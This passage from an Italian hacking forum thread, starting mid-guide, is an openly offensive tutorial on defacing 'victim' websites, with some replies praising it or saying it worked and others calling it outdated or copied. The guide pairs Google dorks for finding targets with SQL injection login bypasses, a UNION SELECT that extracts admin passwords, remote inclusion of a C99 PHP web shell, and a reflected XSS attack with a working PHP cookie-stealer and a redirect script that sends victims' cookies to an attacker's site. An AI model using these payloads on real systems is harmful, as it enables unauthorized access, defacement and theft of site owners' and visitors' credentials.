quindi cm al solito alla ricerca !! questa volta utiliziamo le stringhe
CODICE:
inurl:login\admin.asp
inurl:admin\login.asp
inurl:admin\admin.asp
inurl:amministrazione\login.asp
etc etc

una volta trovata la pagine si inserisce:
CODICE:
user: admin [o qll che si vuole xk la stringa User è indifferente]
pass:' or '
oppure
pass:'or'
è la stessa cosa...

se il sito è vulnerabile dovreste essere loggati cm admin
Questa tecnica fa parte della classificazione
SQL Inject

7° [ LEZIONE SCANNERIZZARE/RACCOGLIERE INFO ]

Bene iniziamo prima di tutto dobbiamo trovare l'ip del server su cui è hostato il sito da defacciare
cm si fa ?
basta aprire il prompt di DOS (START->ESEGUI scrivete CMD)
e mettendo il caso che il sito da defacciare sia
Perfavore, Entra oppure Registrati per vedere i Link!
nel prompt dovete digitare:
ping pippoclub.it
oppure
ping
Perfavore, Entra oppure Registrati per vedere i Link!


e lui vi restituira una pagina cn scritte simili a queste :
CODICE:
Esecuzione di Ping pippoclub.it [ 123.45.6.78] con 32 byte di dati :
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X

N.B:
-logicamente 123.45.6.78 è un IP a caso ma dopo l'esecuzione del ping è quello l'IP che dovrete prendere
-le X sostituiscono dei numeri che possono variare e Xms sarebbe la durata del ping in millisecondi

adesso ottenuto l'ip che fare ?
beh semplice bisogna cercare maggiori info possibili sul sito eseguendo un WHOIS
Con il WHOIS è possibile prendere i dati riguardanti il dominio del sito visto che tutti i domini a pagamento sono registrati
eseguire un WHOIS è molto semplice basta cercare un sito che offra questa possibilita e inserirvi i dati che abbiamo in questo caso l'ip
e ora avrete ottenuto dei dati sul sito vittima alcuni utili alcuni meno in caso contrario provate a cambiare database
dopo questo passaggio (nn fondamentale) dobbiamo disperatamente ottenere altri dati riguardanti la sicurezza e le falle del sito cm fare ?
ci sono 2 modi
-scannerizzare il sito cn programmi che rilevano bug
-port scanner ( spero che sappiate tutti che cos'è e cm funge senno lasciate xdere!)
Cn il primo è possibile ottenere i bug del sito e sfruttarli ma in caso contrario ? cioè se il programma nn trovasse bug ? in tal caso bisogna passare alla seconda opzione
eseguiamo una scannerizzazione del sito e verifichiamo le porte aperte
adesso mettiamo il caso che il server del sito abbia queste porte aperte

21 - FTP

80 - HTTP

139 - NETBIOS SESSION

445 - Microsof Ds

in questo caso dobbiamo cercare un modo x sfruttarle e cm fare ? beh ci sono sempre i metodi tradizionali attakkare tramite netbios , ftp etc etc..
ma se questo nn funziona ? in questo caso utilizzeremo gli EXPLOITS !!
(spero che sappiate tutti che cosa sono gli exploits e ke abbiate delle nozioni fondamentali su di essi)
ma cm trovarli ? semplicissimo andate su siti cm
Perfavore, Entra oppure Registrati per vedere i Link!
e cercate exploit che fanno al caso vostro grazie alle informazioni ricavate cn il WHOIS il port scanner e l'analisi cn il software cerca bug nn dev'essere difficile
una volta trovati provate,provate e riprovate


8° LEZIONE [ RFI ]

In questo capitolo si parla di RFI !! (Remote File Inclusion)(Remote File Include)
quindi utilizzare l'inclusione di file sfruttando spesso variabili nn sicure...
La C99 è una shell fatta in php che una volta inserita in un sito web vi dara la possibilita di avere davanti un pannello FTP cn molte opzioni
innanzitutto
bisogna uppare la shell su un vostro sito rinominandola in: (dopo spieghero il xk)
CODICE:
shell.jpg
C99.txt
shelc99.gif

insomma cm volete tranne che .PHP
adesso dovete cercare siti vulnerabili e cm al solito google è un buon amico
Query di Es.
CODICE:

Inurl:index.php?Conf=

una volta trovata la lista di siti apritene uno e inserite dopo "Conf=" (la variabile) il link della shell
ipotizzando che il link della shell sia
Perfavore, Entra oppure Registrati per vedere i Link!

Es.
Sitovittima.it
e cosi dovreste avere la pag cn la c99 davanti !!!
pikkola parentesi Conf è una variabile cm un'altra e index.php è la pagina principale nel sito , inserendo quel url si "carichera" la shell all'interno della pagina
se volete avere maggiori info sugli url andate su
Perfavore, Entra oppure Registrati per vedere i Link!
e inserite la stringa remote file inclusion oremote file include
L'estensione della shell nn dev'essere php xk noi
vogliamo che una volta inserito il link della shell
sia eseguita sul sito della vittima e nn interpretata


9° LEZIONE [ JPORTAL ]

In questo capitolo ci occuperemo dei siti in JPORTAL!
cerchiamo siti vulnerabili cn google
basta inserire
POWERED BY JPORTAL
apritene uno e inserite affianco al sito:

print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Nella X va inserito il numero dell'ID del utente di cui si vuole trovare la pass (in questo caso l'admin) che di solito è 1,2,3,4,5,6,7
Nn dubito della vostra intelligenza ma preferisco spericificare ankora meglio cn un'altro esempio finale)
Es.1
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Es.2
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Es.3
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

se il sito è vulnerabile dovrebbe uscire na pagina cn l'user e pass del'ID che abbiamo inserito nn hasate
Il resto è intuibile...no?(ihih)
Anke questo attakko fa parte della classificazione
SQL Inject

10° LEZIONE [ DEFACCIARE I GUESTBOOK ]

Questa vulnerabilita è molto simile a qll nelle piattaforme ASP
Cm al solito cercate pagine vulnerabili cn google
Query:
inurl:guestbook/admin/login.php
inurl:guestbook/admin.php
Poi usate un po di fantasia...
Alla schermata di login dell'admin del guestbook inserite questi dati:
CODICE:

USER: 'or 'jr7'='jr7' /*

PASSWORD: qualsiasi
In questo caso, al contrario dell SQL Inject sulle piattaforme ASP, la stringa nulla è qll della password
A questo punto se il sito sara' vulnerabile vi troverete di fronte il pannello di amministrazione del guestbook


11° LEZIONE [ ATTAKKO XSS ]

In questo capitolo ci occuperemo del bug XSS!
prima un po di teoria l'attakko XSS o CSS significa Cross Site Scripting , viene chiamato XSS xk ci si potrebbe confondere cn il CSS che sarebbe Cascading Style Sheets , che assolutamente nn centra nulla , l'attakko viene spesso effettuato a motori di ricerca , i quali (quelli kn il bug) una volta inserita la stringa da ricercare la stampano direttamente a pagina senza "filtrarla" ad Es.
se io volessi cercare CIAO BELLO in un motore di ricerca e nn trovassi niente la pagina risponderebbe
Non è stato trovato alcun risultato con la parola CIAO BELLO
e in questo caso sara possibile inserire al posto della stringa CIAO BELLO un javascript )
adesso ricapitoliamo )
Mettiamo il caso di aver trovato un sito potenzialmente vulnerabile e vorremmo approfittarne, cm fare? basta inserire nella stringa della ricerca un javascript
CODICE:

Es.
<script language=JavaScript> window.alert("LoRdHaLo"); </script>

in caso di presenza del bug una volta avviata la ricerca vi si aprira una finestra a stile alert cn scritto LoRdHaLo ( testo ovviamente modificabile)
cn la presenza di questo bug nn solo è possibile far aprire qll finestrina ma è possibile reindirizzare il visitatore della pagina su altri siti a nostro piacimento , magari siti che rubano cookies e/o loggano l'IP ecc
Adesso spieghero cm utilizzare una vulnerabilita di questo tipo eseguendo un Cookies Grabber
Inserire in un pagina PHP questo codice :
CODICE:
<?PHP
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


');
fclose($fp);
?>

Ovvero questa pagina una volta aperta loggera i cookies e l'IP della vittima in un file di nome cookies.txt...
Adesso salviamo la pagina cn il nome di cookie.php e uppiamola sul nostro sito in questo caso
Perfavore, Entra oppure Registrati per vedere i Link!

Dopo aver inserito lo script : <script language=JavaScript> window.alert("SIOUX83"); </script>
Il link della pagina dovrebbe essere simile a questo
CODICE:

http://www.sitovittima.com/ricerca.php?k...<script language=JavaScript> window.alert("LoRdHaLo"); </script>

ma cm redirezionare la vittima sulla pagina in modo da rubargli i cookie ?
beh semplice, innanzitutto dobbiamo creare il link da dare alla vittima sostituendo il javascript

CODICE:
<script language=JavaScript> window.alert("LoRdHaLo"); </script> cn questo
<script language="JavaScript"> window.location="http://www.sitomio.net/cookie.php?cooked="+document
:emoji_smiley:



Fonte?L'Ho Già Vista.
Comunque Bravo Per Averlo Postato,anche se i complimenti vanno al creatore della guida.
 
Ultima modifica:
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Questa guida oltre ad essere molto vecchia in quanto tutte le falle di php-nuke, phpbb, JPortal non sono più funzionanti e risalgono ad anni fa, dovrebbe essere postata qui Web Security & Attack anche perché non centra niente con Habbo.

Dimenticavo cerca prima di postare ._.

http://www.sciax2.it/forum/guide-tu...-normali-com-org-net-tv-easy-40-a-434482.html

Hai ragione
ne esistono tante e tante di queste guide
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Ahahaha. Concordo pienamente con te ho sempre odiato le *K*

Questi post sono considerati inutili dal regolamento,sei da molto sul forum e dovresti saperlo,Avverto.
La prossima volta stai più attento ;).
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Bravo Bella Guida Potra Servire :emoji_smiley: Bella O Provato A Farlo E Andato! ;D Bravo E Grazie!
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Bravo Bella Guida Potra Servire :emoji_smiley: Bella O Provato A Farlo E Andato! ;D Bravo E Grazie!

E' la seconda volta che ti becco,questa volta infraziono,e sposto in una sezione più adeguata.
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Bella guida bravo!
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

non c'è nulla di vero in questa guida , cio'è come dire una guida su come riutilizzare un preservativo sarebbe più consona , secondo me per chi ne capsice almeno 0,1 % del argomento trattato queto post sfigura il forum intero..
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Bravo! Anche se non è tua Bravo! molto dettagliata. 8/10
 
Riferimento: Ecco qui una nuova guida su come defacciare manualmente, senza programmi

Sono sempre le solite guide bla bla, ma scusate non avete niente da fare che fare copia e incolla delle altre guide ? :basta: